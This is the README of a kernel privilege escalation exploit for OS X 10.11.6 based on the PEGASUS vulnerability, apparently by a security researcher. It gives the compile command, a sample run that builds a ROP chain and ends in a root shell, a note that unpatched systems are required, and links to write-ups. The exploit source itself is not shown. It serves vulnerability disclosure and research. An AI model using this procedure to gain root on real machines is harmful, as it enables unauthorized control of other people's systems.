#Local privilege escalation for OS X 10.11.6 via PEGASUS
-
Write up:
1. Chinese Version: https://jaq.alibaba.com/community/art/show?articleid=531
2. English Version: https://jaq.alibaba.com/community/art/show?articleid=532 -
by Min(Spark) Zheng (twitter@SparkZheng, weibo@蒸米spark)
-
Note:
1. If you want to test this exp, you should not install Security Update 2016-001 (like iOS 9.3.5 patch for PEGASUS).
2. I hardcoded a kernel address to calcuate kslide, it maybe different on your mac. -
Compile:
clang -framework IOKit -framework Foundation -framework CoreFoundation -m32 -Wl,-pagezero_size,0 -O3 exp.m lsym.m -o exp -
Run the exp:
MacBookPro:PEGASUS zhengmin$ ./exp
getting kslide...
kslide=0x8e00000
building the rop chain...
exploit the kernel...
sh-3.2# whoami
root
sh-3.2# uname -a
Darwin MacBookPro 15.6.0 Darwin Kernel Version 15.6.0: Thu Jun 23 18:25:34 PDT 2016; root:xnu-3248.60.10~1/RELEASE_X86_64 x86_64 -
Special thanks to proteas, qwertyoruiop, windknown, aimin pan, jingle, liangchen, qoobee, etc.
-
Reference:
1. http://blog.pangu.io/cve-2016-4655/
2. https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html
3. https://bazad.github.io/2016/05/mac-os-x-use-after-free/
4. https://github.com/kpwn/tpwn